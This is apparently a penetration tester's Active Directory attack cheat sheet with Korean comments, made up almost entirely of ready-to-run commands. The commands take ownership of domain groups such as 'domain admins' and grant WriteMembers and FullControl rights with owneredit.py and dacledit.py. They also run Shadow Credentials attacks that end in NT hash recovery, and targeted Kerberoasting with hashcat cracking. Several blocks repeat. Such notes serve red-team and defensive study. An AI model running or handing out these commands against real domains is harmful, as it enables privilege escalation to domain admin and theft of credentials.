# OwnerEdit
owneredit.py -action write -new-owner attacker -target victimGroup domain.com/user:pass
owneredit.py -action write -new-owner abuse -target 'domain admins' choi.local/abuse:'Password123!'
# WriteMember - AddMember
dacledit.py -action write -rights WriteMembers -principal attacker -target-dn target choi.local/user:pass
dacledit.py -action write -rights WriteMembers -principal abuse -target 'domain admins' choi.local/abuse:'Password123!'
# 이후 AddMember 등을 활용
# OwnerEdit
owneredit.py -action write -new-owner attacker -target victimGroup domain.com/user:pass
# WriteDACL으로 FullControl DACL 부여
dacledit.py -action write -rights FullControl -principal attacker -target targetUser domain.com/user:pass
# FullControl 기반으로한 Shadow Credentials, Targeted Kerberoasting, 등.
# ShadowCredentials 공격
pywhisker.py -d domain.local -u controlledAccount -p pass --target targetAccount --action add
python3 gettgtpkinit.py -cert-pfx <pfx> -pfx-pass <pass> domain.com/target target.ccache
export KRB5CCNAME=target.ccache
python3 getnthash.py -key <AS-REP Encryption key> domain.com/target
# 공격자로서 추가했던 DeviceID만 삭제
python3 pywhisker.py -d choi.local -u abuse -p 'Password123!' --target victim --action remove -D <DeviceID>
# 확인
python3 pywhisker.py -d choi.local -u abuse -p 'Password123!' --target victim --action list
---
# Targeted Kerberoasting
git clone https://github.com/ShutdownRepo/targetedKerberoast.git
python3 targetedKerberoast.py -v -d domain.com -u attacker -p pass --request-user targetUser --only-abuse
hashcat -a 0 -m 13100 <hash> <wordlist>
# OwnerEdit
owneredit.py -action write -new-owner attacker -target victimGroup domain.com/user:pass
# WriteDACL으로 FullControl DACL 부여
dacledit.py -action write -rights FullControl -principal attacker -target targetUser domain.com/user:pass
# FullControl 기반으로한 RBCD, Shadow Credentials, LAPS 등